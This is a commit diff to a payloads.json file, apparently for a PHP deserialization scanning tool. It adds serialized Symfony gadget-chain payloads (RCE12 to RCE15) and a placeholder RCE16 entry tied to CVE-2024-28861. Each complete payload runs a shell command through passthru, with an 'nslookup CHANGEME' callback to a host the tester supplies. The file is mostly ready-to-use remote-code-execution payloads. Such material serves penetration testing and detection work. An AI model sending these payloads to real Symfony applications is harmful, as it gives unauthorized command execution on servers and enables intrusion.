Update payloads.json

### Add: - Symfony/RCE12 - Symfony/RCE13 - Symfony/RCE14 - Symfony/RCE15 ### Ref: ambionics/phpggc#182
ricardojba · Mar 25, 2024 · 6112f75 · 6112f75
1 parent 17f45f5
commit 6112f75
Showing 1 changed file with 31 additions and 0 deletions.
diff --git a/res/payloads.json b/res/payloads.json
@@ -366,6 +366,37 @@
     "gen_with": "./phpggc Symfony/RCE11 <function> <parameter>",
     "payload": "C:67:\"Symfony\\Component\\Security\\Core\\Authentication\\Token\\AnonymousToken\":569:{a:2:{i:0%3BN%3Bi:1%3BO:37:\"Symfony\\Component\\BrowserKit\\Response\":1:{s:46:\"%00Symfony\\Component\\BrowserKit\\Response%00headers\"%3BO:50:\"Symfony\\Component\\Finder\\Iterator\\SortableIterator\":2:{s:60:\"%00Symfony\\Component\\Finder\\Iterator\\SortableIterator%00iterator\"%3BO:51:\"Symfony\\Component\\Validator\\ConstraintViolationList\":1:{s:63:\"%00Symfony\\Component\\Validator\\ConstraintViolationList%00violations\"%3Ba:2:{i:0%3Bs:8:\"passthru\"%3Bi:1%3Bs:63:\"nslookup CHANGEME\"%3B}}s:56:\"%00Symfony\\Component\\Finder\\Iterator\\SortableIterator%00sort\"%3Bs:14:\"call_user_func\"%3B}}}}"
   },
+  {
+    "_needs_dynamic_payload_editing": false,
+    "name": "Symfony 1.3.0 <= 1.5.13~17 (12)",
+    "gen_with": "./phpggc Symfony/RCE12 <function> <parameter>",
+    "payload": "O:27:\"Swift_KeyCache_DiskKeyCache\":2:{s:34:\"%00Swift_KeyCache_DiskKeyCache%00_path\"%3Bs:25:\"thispathshouldneverexists\"%3Bs:34:\"%00Swift_KeyCache_DiskKeyCache%00_keys\"%3BO:29:\"sfOutputEscaperArrayDecorator\":2:{s:8:\"%00*%00value\"%3Ba:1:{i:1%3Bs:63:\"nslookup+CHANGEME\"%3B}s:17:\"%00*%00escapingMethod\"%3Bs:8:\"passthru\"%3B}}"
+  },
+
+  {
+    "_needs_dynamic_payload_editing": false,
+    "name": "Symfony 1.2.0 <= 1.2.12 (13)",
+    "gen_with": "./phpggc Symfony/RCE13 <function> <parameter>",
+    "payload": "C:15:\"sfDoctrinePager\":177:{O:29:\"sfOutputEscaperArrayDecorator\":2:{s:8:\"%00*%00value\"%3Ba:1:{i:0%3Bs:63:\"nslookup+CHANGEME\"%3B}s:17:\"%00*%00escapingMethod\"%3Bs:8:\"passthru\"%3B}}"
+  },
+  {
+    "_needs_dynamic_payload_editing": false,
+    "name": "Symfony 1.2.0 <= 1.2.12 (14)",
+    "gen_with": "./phpggc Symfony/RCE14 <function> <parameter>",
+    "payload": "O:14:\"PropelDateTime\":2:{s:26:\"%00PropelDateTime%00dateString\"%3BN%3Bs:24:\"%00PropelDateTime%00tzString\"%3BO:30:\"sfOutputEscaperObjectDecorator\":2:{s:8:\"%00*%00value\"%3BO:13:\"sfCultureInfo\":8:{s:14:\"%00*%00dataFileExt\"%3Bs:4:\".dat\"%3Bs:7:\"%00*%00data\"%3Ba:0:{}s:10:\"%00*%00culture\"%3Bs:63:\"nslookup+CHANGEME\"%3Bs:10:\"%00*%00dataDir\"%3BN%3Bs:12:\"%00*%00dataFiles\"%3Ba:0:{}s:17:\"%00*%00dateTimeFormat\"%3BN%3Bs:15:\"%00*%00numberFormat\"%3BN%3Bs:13:\"%00*%00properties\"%3Ba:0:{}}s:17:\"%00*%00escapingMethod\"%3Bs:8:\"passthru\"%3B}}"
+  },
+  {
+    "_needs_dynamic_payload_editing": false,
+    "name": "Symfony 1.0.0 <= 1.1.9 (15)",
+    "gen_with": "./phpggc Symfony/RCE15 <function> <parameter>",
+    "payload": "O:15:\"MySQLiTableInfo\":15:{s:7:\"%00*%00name\"%3BN%3Bs:10:\"%00*%00columns\"%3BO:29:\"sfOutputEscaperArrayDecorator\":2:{s:8:\"%00*%00value\"%3Ba:1:{i:0%3Bs:63:\"nslookup+CHANGEME\"%3B}s:17:\"%00*%00escapingMethod\"%3Bs:8:\"passthru\"%3B}s:14:\"%00*%00foreignKeys\"%3Ba:0:{}s:10:\"%00*%00indexes\"%3Ba:0:{}s:13:\"%00*%00primaryKey\"%3BN%3Bs:11:\"%00*%00pkLoaded\"%3Bb:0%3Bs:12:\"%00*%00fksLoaded\"%3Bb:0%3Bs:16:\"%00*%00indexesLoaded\"%3Bb:0%3Bs:13:\"%00*%00colsLoaded\"%3Bb:0%3Bs:15:\"%00*%00vendorLoaded\"%3Bb:0%3Bs:21:\"%00*%00vendorSpecificInfo\"%3Ba:0:{}s:7:\"%00*%00conn\"%3BN%3Bs:11:\"%00*%00database\"%3BN%3Bs:9:\"%00*%00dblink\"%3BN%3Bs:9:\"%00*%00dbname\"%3BN%3B}"
+  },
+  {
+    "_needs_dynamic_payload_editing": false,
+    "name": "Symfony 1.1.0 <= 1.5.18 (CVE-2024-28861) (16)",
+    "gen_with": "./phpggc Symfony/RCE16 <function> <parameter>",
+    "payload": "placeholder"
+  },
   {
     "_needs_dynamic_payload_editing": false,
     "name": "ThinkPHP 5.1.x-5.2.x (1)",